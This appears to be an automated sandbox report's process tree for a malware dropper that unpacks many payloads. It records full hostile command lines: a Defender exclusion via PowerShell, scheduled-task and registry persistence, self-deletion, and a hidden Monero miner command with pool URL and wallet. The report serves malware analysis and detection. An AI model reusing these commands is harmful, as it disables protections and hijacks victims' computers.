- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2808
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2364
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6172
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:6888
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4532
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1568
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6352
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:6328
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2248
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2264
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5464
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4256
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1288
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:7052
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4352
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3116
- C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
  C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:3704
- - C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
    C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
    3⤵
    PID:6760
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6524
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1104
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:580
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3628
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2304
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1448
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:1760
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3636
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  PID:2952
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1924
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:2352
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3076
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  PID:4780
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3676
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4080
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3168
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  PID:6252
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5904
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:2332
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:68

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:628
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2176
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun152260a303c33a7.exe
        
        Sun152260a303c33a7.exe
        5⤵
        Executes dropped EXE
        
        PID:3444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun15d8dfe2c6d17.exe
        
        Sun15d8dfe2c6d17.exe
        5⤵
        Executes dropped EXE
        
        PID:3104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150d896340a863.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun150d896340a863.exe
        
        Sun150d896340a863.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4024
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun150d896340a863.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun150d896340a863.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun150d896340a863.exe /f
        7⤵
        Kills process with taskkill
        
        PID:6060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2688
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun15b61bf18b0f1.exe
        
        Sun15b61bf18b0f1.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2256
      - C:\Users\Admin\AppData\Local\Temp\is-0QB80.tmp\Sun15b61bf18b0f1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0QB80.tmp\Sun15b61bf18b0f1.tmp" /SL5="$5005A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun15b61bf18b0f1.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\is-2AA8L.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-2AA8L.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:4512
        
        C:\Program Files\Windows Mail\DBHCHLZAAQ\ultramediaburner.exe
        
        "C:\Program Files\Windows Mail\DBHCHLZAAQ\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\is-54IMT.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-54IMT.tmp\ultramediaburner.tmp" /SL5="$601AC,281924,62464,C:\Program Files\Windows Mail\DBHCHLZAAQ\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5532
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\81-c6b18-84d-0a5bb-042db99567804\Goshekycezhae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\81-c6b18-84d-0a5bb-042db99567804\Goshekycezhae.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\bc-9f94a-716-f899a-6d7c610468e3a\Ralaejoloni.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bc-9f94a-716-f899a-6d7c610468e3a\Ralaejoloni.exe"
        8⤵
        Executes dropped EXE
        
        PID:4976
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c14ust0h.qbe\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\c14ust0h.qbe\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\c14ust0h.qbe\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:6688
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itkeksoh.qcp\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\itkeksoh.qcp\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\itkeksoh.qcp\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:7008
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\itkeksoh.qcp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\itkeksoh.qcp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631218641 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:4644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pphyjzmt.q0v\anyname.exe & exit
        9⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\pphyjzmt.q0v\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\pphyjzmt.q0v\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:3936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\enijf2jk.2nf\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\enijf2jk.2nf\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\enijf2jk.2nf\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:6028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lbn115if.j2a\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun157ff8e4440aa.exe
        
        Sun157ff8e4440aa.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4296
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:4760
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:4944
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6500
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:6984
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:6024
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
        
        C:\ProgramData\3953857.exe
        
        "C:\ProgramData\3953857.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
        
        C:\ProgramData\6807523.exe
        
        "C:\ProgramData\6807523.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:4964
        
        C:\ProgramData\2468946.exe
        
        "C:\ProgramData\2468946.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3928
        
        C:\ProgramData\2468946.exe
        
        "C:\ProgramData\2468946.exe"
        9⤵
        Executes dropped EXE
        
        PID:4764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 900
        9⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
        
        C:\ProgramData\4051283.exe
        
        "C:\ProgramData\4051283.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4436
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4436 -s 1528
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 804
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 816
        8⤵
        Program crash
        
        PID:4536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 856
        8⤵
        Program crash
        
        PID:4432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 900
        8⤵
        Program crash
        
        PID:4204
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 996
        8⤵
        Program crash
        
        PID:3956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 800
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        Executes dropped EXE
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        
        PID:5544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "
        9⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5300
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        11⤵
        Executes dropped EXE
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        13⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        14⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        15⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
        14⤵
        Creates scheduled task(s)
        
        PID:5768
        
        C:\Users\Admin\AppData\Local\Temp\downloadmanager\downloadmanager.exe
        
        "C:\Users\Admin\AppData\Local\Temp\downloadmanager\downloadmanager.exe"
        14⤵
        Executes dropped EXE
        
        PID:7028
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\tvpd.vbs" /f=CREATE_NO_WINDOW install.cmd
        15⤵
        
        PID:620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\GUI\TVtuner\301le.bat" "
        16⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 7
        17⤵
        Delays execution with timeout.exe
        
        PID:4320
        
        C:\GUI\TVtuner\tvps.exe
        
        "tvps.exe" e -pVusya78gasxhgxahghxsahgV insl.rar
        17⤵
        Executes dropped EXE
        
        PID:4280
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        17⤵
        Delays execution with timeout.exe
        
        PID:5896
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\GUI\TVtuner\spr.vbs"
        17⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\GUI\TVtuner\G7.bat" "
        18⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\GUI"
        19⤵
        Views/modifies file attributes
        
        PID:4468
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        19⤵
        Delays execution with timeout.exe
        
        PID:5972
        
        C:\GUI\TVtuner\civdata.exe
        
        civdata.exe /start
        19⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4208
        
        C:\GUI\TVtuner\civdata.exe
        
        civdata.exe /start
        20⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6348
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tvps.exe
        19⤵
        Kills process with taskkill
        
        PID:7068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tvps.exe
        19⤵
        Kills process with taskkill
        
        PID:6336
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\GUI\TVtuner"
        19⤵
        Views/modifies file attributes
        
        PID:6260
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 4
        19⤵
        Delays execution with timeout.exe
        
        PID:6880
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        17⤵
        Delays execution with timeout.exe
        
        PID:5480
        
        C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exe
        
        FoxyIDM621d.exe
        10⤵
        Executes dropped EXE
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
        11⤵
        Executes dropped EXE
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        
        PID:4988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3908
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun1584240df9fe73a3.exe
        
        Sun1584240df9fe73a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3768
      - C:\ProgramData\2924801.exe
        
        "C:\ProgramData\2924801.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:744
      - C:\ProgramData\2895414.exe
        
        "C:\ProgramData\2895414.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3792
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4744
      - C:\ProgramData\3177034.exe
        
        "C:\ProgramData\3177034.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2836
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun150faeb3537d.exe
        
        Sun150faeb3537d.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
